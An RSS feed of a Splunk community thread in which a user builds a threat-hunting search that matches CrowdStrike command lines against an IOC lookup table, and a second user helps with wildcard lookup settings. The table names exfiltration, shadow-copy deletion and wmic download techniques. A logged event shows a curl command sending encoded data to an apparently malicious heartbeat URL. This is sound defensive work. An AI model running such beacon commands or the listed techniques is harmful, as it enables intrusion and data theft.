<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Displaying matching command strings from lookup table in Splunk Search</title>
    <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687491#M234467</link>
    <description>&lt;P&gt;All -&lt;/P&gt;
&lt;P&gt;I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below:&lt;/P&gt;
&lt;TABLE border="1" width="100%"&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;commands&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;description&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;7z a -t7z -r&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Compress data for exfiltration&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;vssadmin.*&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Delete Shadows Deletion of Shadow copy&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;*wmic*process*call*create*&lt;BR /&gt;&lt;BR /&gt;&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Uses WMI to create processes&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;wmic*get*http&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Using wmic to get and run files from internet&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TBODY&gt;
&lt;/TABLE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;I am using this lookup table commands string against CrowdStrike CommandLine to hunt for any matches commands run by any user in our environment. So when the CommandLine filed from CrowdStrike logs matches any commands string from lookup table, it should generate an alert. What we are trying to achieve is when there is an alert it should also tell us the description of the matching command so we know which command matched with the CrowdStrike CommandLine. The final result should be like this:&lt;/P&gt;
&lt;TABLE border="1" width="100%"&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;CommandLine&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;description&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;commands&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L &lt;A href="http://wvfg.wetmet.net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d" target="_blank" rel="noopener"&gt;http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d&lt;/A&gt;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;Using wmic to get and run files from internet&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;wmic*get*http&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TBODY&gt;
&lt;/TABLE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;I have come up with below search it gives me an alert but not able to display the matching command and description. Any help would be much appreciated!&lt;/P&gt;
&lt;LI-CODE lang="markup"&gt;index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands OUTPUT description | table _time, CommandLine, description, commands&lt;/LI-CODE&gt;</description>
    <pubDate>Tue, 14 May 2024 21:53:59 GMT</pubDate>
    <dc:creator>cybersunny</dc:creator>
    <dc:date>2024-05-14T21:53:59Z</dc:date>
    <item>
      <title>Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687491#M234467</link>
      <description>&lt;P&gt;All -&lt;/P&gt;
&lt;P&gt;I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below:&lt;/P&gt;
&lt;TABLE border="1" width="100%"&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;commands&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;description&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;7z a -t7z -r&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Compress data for exfiltration&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;vssadmin.*&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Delete Shadows Deletion of Shadow copy&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;*wmic*process*call*create*&lt;BR /&gt;&lt;BR /&gt;&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Uses WMI to create processes&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="50%" height="25px"&gt;wmic*get*http&lt;/TD&gt;
&lt;TD width="50%" height="25px"&gt;Using wmic to get and run files from internet&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TBODY&gt;
&lt;/TABLE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;I am using this lookup table commands string against CrowdStrike CommandLine to hunt for any matches commands run by any user in our environment. So when the CommandLine filed from CrowdStrike logs matches any commands string from lookup table, it should generate an alert. What we are trying to achieve is when there is an alert it should also tell us the description of the matching command so we know which command matched with the CrowdStrike CommandLine. The final result should be like this:&lt;/P&gt;
&lt;TABLE border="1" width="100%"&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;CommandLine&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;description&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;commands&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L &lt;A href="http://wvfg.wetmet.net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d" target="_blank" rel="noopener"&gt;http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d&lt;/A&gt;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;Using wmic to get and run files from internet&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;wmic*get*http&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TBODY&gt;
&lt;/TABLE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;I have come up with below search it gives me an alert but not able to display the matching command and description. Any help would be much appreciated!&lt;/P&gt;
&lt;LI-CODE lang="markup"&gt;index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands OUTPUT description | table _time, CommandLine, description, commands&lt;/LI-CODE&gt;</description>
      <pubDate>Tue, 14 May 2024 21:53:59 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687491#M234467</guid>
      <dc:creator>cybersunny</dc:creator>
      <dc:date>2024-05-14T21:53:59Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687497#M234469</link>
      <description>&lt;P&gt;To use wildcards in lookups they have to be defined as match type WILDCARD&lt;/P&gt;&lt;P&gt;&lt;A href="https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition" target="_blank"&gt;https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition&lt;/A&gt;&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 14:41:14 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687497#M234469</guid>
      <dc:creator>ITWhisperer</dc:creator>
      <dc:date>2024-05-14T14:41:14Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687499#M234471</link>
      <description>&lt;P&gt;I tried with lookup definition "WILDCARD(commands)" but that didn't work!&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 14:52:39 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687499#M234471</guid>
      <dc:creator>cybersunny</dc:creator>
      <dc:date>2024-05-14T14:52:39Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687505#M234473</link>
      <description>&lt;P&gt;Please share the event which was supposed to have matched and the entry in the lookup that it should have matched to&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 15:38:23 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687505#M234473</guid>
      <dc:creator>ITWhisperer</dc:creator>
      <dc:date>2024-05-14T15:38:23Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687513#M234477</link>
      <description>&lt;P&gt;Here is the event:&lt;BR /&gt;{"ChangeTime":"159019401599.660","CapPrm":"274877906943","ParentProcessId":"41312874540918","SourceProcessId":"41312874540918","aip":"167.8.84.8","SessionProcessId":"41312874540918","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1715545935.034","SVUID":"0","EventOrigin":"1","id":"92d99f91-6970-4f66-a38a-762e6b2af7b9","EffectiveTransmissionClass":"2","Tags":"12094627905582, 12094627906234","timestamp":"1715545919041","ProcessGroupId":"32517225337224","event_simpleName":"ProcessRollup2","RawProcessId":"17459","RootPath":"/","GID":"0","SVGID":"0","MD5HashData":"b194675c8ea858f2ed21214e9bbfc16b","SHA256HashData":"14ac73386c9ca706968f2ad2bd2a861f37659d669756e730fe2747d3b726f1da","UID":"0","CommandLine":"curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=IYtBsvtfYai1wFsAeUU1ad8hCB8fX2hRrPvM%2bfwQVOb30LoDJluceAyV5jg75J8bHbinyYONJqjAbsrxiZwsLcFKHE59NwzNLLBkZ88ZBNu%2bc%2bGO2WxnITbXkXZyQJkMbdXlnnAwJ602gWkuOhmsiw3Ft5c%2b4Tduq615Hllj4u5whtm9TQxay%2bOQy4mVeJ7tfurRODGqsHw6mlsjXSpmgNUA5cSDVkiuc1pCzMugiOur5Dh2XoG7ABj%2bfEjEBe33hjD6431XFaKA8YkUoLJ424pYBhiFc%2bSK7Xd1csiCYwK4jwO98E4%2f8vLn37nFw8a2Uwiy8lOeP1e1skwDMccJR7jhAndmIQtSL1GruLm9lUpGwt%2b%2bmm%2bwawKl6NEca%2bNLJeWq7EcnfpPsZzPkV9kpyPu8Pz2mrZy%2fkKoXUEoeP0IOg6sRDrYu4%2bDNhcLT3znS8OqBxi%2bZypOcnABSwamvRXP048qJHQx7pm7yPkMaG20VjGtP48RUNGM2jloRNtbgHfJW2D3BmRp2De8rNRp5fdnzKB0i%2fUfYQ%2fWbLxYoZ4LQv3YEvT6XssTi1yScdJj3miAD%2b9Q5y4R1%2fLKUO9BUIeKvf0Zm23k7BSiqznd2skvuqUo4gb6JPwPW4zpctCiAKwZlKDY4AbZe1gBkJJWrrv%2bJ8VJTP37W5fTFtsqqTEc8ziL40%2bvqes1NLAiSEN31ABppkOmgZtkPXrC42utxYLjeMC06Raic6iLmymZo%2f5UrD31SshEm5k6KvVdZ2Bf%2fsPPjsf8uXfzhTxDmvWgYcVAkbvsukaVBQcrvqxXd1zSKbgTWEO41uXWdPSNqZtHj2TubS%2flCikiJPYX1zMhjsFFvkGlPIyTz%2bgCvm3JzLlcVT%2fLWJ216l4ozrD0%2b2Gq4wHuUlE8zcHZo00Vo9ysmAqEQ8HoWVzr1ZRRY7Lfn%2bhS0V7Uvlt65JDEm%2bA3aRcwNDBiNjkYNrU3LfTnBdCKgE1b8qpzcwoJMuPNadSZLPa3gKP%2fLXWNN266rW%2f1bqg5exR%2bk8D2ipueAUYYuJlCvsyvvU%2bh%2fF6zyJzqKN8zpy1tWtpGPBzFEbxixjBozX3LfficGlz1hDuLEclKKpH8rpOHSwsXrHGX%2fEiN5NRx4tPyR%2bGWmPMXm94ZazpH153EW0ixtQNaJJBBkR1Jmave6xacXustk9Tz67EcB0cPY2cEL%2bKzTVm%2fv7mEJRO2ohkzGmfBYsncbzBB3CssQp%2fSNcOoX%2fFl%2bBKiA3YSGiOuLv4nPG84PkfOKwTd7irZF3evTl4GEg8Ajkm54fMf5kFY1v3fH3b9NfPwZDMlDKOCNMYJuhXmglCdI1FQsJiIlyPZVrY21YcmQgGfJT7Bau64wq%2bHfP2p9P1oyU4%2f3mkH3tkWb%2bL754Ss%2fIRl%2fFFY9rOHOt7kBphaFgB9JEaoxFTtIYy%2fT66BXmr957lKlBiJg08FYBYE1PR6%2bPwMiCftCu2tdU3HulvTGR1Exc4shovJAVgq6iwWYHmpZo%2bqRuM8cz1itutz%2b%2bm7ZQDlbaiU1%2bSvDGOgBU%2f423vojnbrHKb6hYQIS%2bGrSBUuJBeZHLiKOfkPfsFvNYZIcmD%2bRkNCgwf4nTooOIY5GffKGH0LOPeT8RZzOcytEBjyu9%2fMQVIonZMc73lavnz7uPCRtGiezB%2fjkFj5UkSplosXjlN%2fyQbfoR5RQhUcgVKQpoSGrSUeT%2bSRyrV5QBtDwHTykUIzAUu%2bUvC3Vfwe0Oz24TCTfRFm%2bKhHGEt7v9PB8NZ0oCzkMwR6VerNptlspoWGjr91j0OXB6hlxjDxOD%2bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L &lt;A href="http://wvcfg.wetmet.net/api/serverservice/heartbeat.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bj0%3d&amp;amp;version=Y9Ml9TL3Ayxy77SNYVWxkLuS7eHa4%2bBQxFHVCdAP%2f%2fw%3d&amp;quot;,&amp;quot;TargetProcessId&amp;quot;:&amp;quot;43142923935709&amp;quot;,&amp;quot;ImageFileName&amp;quot;:&amp;quot;/usr/bin/curl&amp;quot;,&amp;quot;RGID&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;SourceThreadId&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;RUID&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;ProcessStartTime&amp;quot;:&amp;quot;1715545934.678&amp;quot;,&amp;quot;aid&amp;quot;:&amp;quot;42ab2efd409d492ba5f376f467370a44&amp;quot;,&amp;quot;cid&amp;quot;:&amp;quot;09919f785a7e46ef8c53da25fbd9d186&amp;quot;}" target="_blank" rel="noopener"&gt;http://wvcfg.wetmet.net/api/serverservice/heartbeat.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bj0%3d&amp;amp;version=Y9Ml9TL3Ayxy77SNYVWxkLuS7eHa4%2bBQxFHVCdAP%2f%2fw%3d","TargetProcessId":"43142923935709","ImageFileName":"/usr/bin/curl","RGID":"0","SourceThreadId":"0","RUID":"0","ProcessStartTime":"1715545934.678","aid":"42ab2efd409d492ba5f376f467370a44","cid":"09919f785a7e46ef8c53da25fbd9d186"}&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;It should match with this lookup entry:&lt;/P&gt;&lt;TABLE border="1" width="100%"&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD width="50%" height="25px"&gt;wmic*get*http&lt;/TD&gt;&lt;TD width="50%" height="25px"&gt;Using wmic to get and run files from internet&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;It does matches but I am just not able to display command and description in my final result.&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Thank you&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 16:14:49 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687513#M234477</guid>
      <dc:creator>cybersunny</dc:creator>
      <dc:date>2024-05-14T16:14:49Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687516#M234478</link>
      <description>&lt;P&gt;If you change your lookup entry to&lt;/P&gt;&lt;LI-CODE lang="markup"&gt;*wmic*get*http*&lt;/LI-CODE&gt;&lt;P&gt;does it match?&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 16:46:27 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687516#M234478</guid>
      <dc:creator>ITWhisperer</dc:creator>
      <dc:date>2024-05-14T16:46:27Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687519#M234479</link>
      <description>&lt;P&gt;Yes, it does matches, but I am struggling with displaying command and description in final result.&lt;/P&gt;&lt;P&gt;As per my logic above when I use the&amp;nbsp; | table CommandLine, commands, description ---- it just displays CommandLine, and column commands, description comes as blank.&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 17:07:50 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687519#M234479</guid>
      <dc:creator>cybersunny</dc:creator>
      <dc:date>2024-05-14T17:07:50Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687521#M234480</link>
      <description>&lt;P&gt;I am not sure I understand - if it matches, what gets returned?&lt;/P&gt;&lt;P&gt;Also, what permissions/scope do you have on you have on your lookup file and lookup definition? (Make sure they are accessible by all apps)&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 17:20:58 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687521#M234480</guid>
      <dc:creator>ITWhisperer</dc:creator>
      <dc:date>2024-05-14T17:20:58Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687523#M234481</link>
      <description>&lt;P&gt;&lt;span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ITWhisperer_0-1715706964258.png" style="width: 400px;"&gt;&lt;img src="https://community.splunk.com/t5/image/serverpage/image-id/30818iB0E4A5B033344E9E/image-size/medium?v=v2&amp;amp;px=400" role="button" title="ITWhisperer_0-1715706964258.png" alt="ITWhisperer_0-1715706964258.png" /&gt;&lt;/span&gt;&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 17:16:13 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687523#M234481</guid>
      <dc:creator>ITWhisperer</dc:creator>
      <dc:date>2024-05-14T17:16:13Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687526#M234483</link>
      <description>&lt;P&gt;Hi -&lt;/P&gt;
&lt;P&gt;To explain, we have ioc_check table with over 100 commands, we are matching this commands with CrowdStrike CommandLine as a hunting perspective. This is the SPL we have which alerts us when CommandLine matches with commands string from lookup table.&lt;/P&gt;
&lt;LI-CODE lang="markup"&gt;index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands AS CommandLine OUTPUT description | table  CommandLine, commands, description

&lt;/LI-CODE&gt;
&lt;P&gt;&lt;BR /&gt;The results we are getting as:&lt;/P&gt;
&lt;TABLE border="1" width="100%"&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;CommandLine&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;commands&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;description&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="135px"&gt;curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L &lt;A href="http://wvfg.wetmet.net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d" target="_blank" rel="noopener nofollow noreferrer"&gt;http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...&lt;/A&gt;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="135px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="135px"&gt;&amp;nbsp;&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TBODY&gt;
&lt;/TABLE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;However, the result we want as this:&lt;/P&gt;
&lt;TABLE border="1" width="100%"&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;CommandLine&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;commands&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;description&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L &lt;A href="http://wvfg.wetmet.net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d" target="_blank" rel="noopener nofollow noreferrer"&gt;http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...&lt;/A&gt;&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;*wmic*get*http*&lt;/TD&gt;
&lt;TD width="33.333333333333336%" height="25px"&gt;Using wmic to get and run files from internet&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TBODY&gt;
&lt;/TABLE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Also, we have Global permissions to All apps for both Lookup table and definition.&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 21:54:53 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687526#M234483</guid>
      <dc:creator>cybersunny</dc:creator>
      <dc:date>2024-05-14T21:54:53Z</dc:date>
    </item>
    <item>
      <title>Re: Displaying matching command strings from lookup table</title>
      <link>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687544#M234493</link>
      <description>&lt;P&gt;The CommandLine example you have shown does not match the lookup wildcard string you have shown so it is not surprising that you don't get any results returned from the lookup.&lt;/P&gt;&lt;P&gt;Also, if the commands lookup field already contains leading and trailing * there should be no need to add them to the CommandLine filter in the subsearch.&lt;/P&gt;</description>
      <pubDate>Tue, 14 May 2024 22:24:31 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/Displaying-matching-command-strings-from-lookup-table/m-p/687544#M234493</guid>
      <dc:creator>ITWhisperer</dc:creator>
      <dc:date>2024-05-14T22:24:31Z</dc:date>
    </item>
  </channel>
</rss>

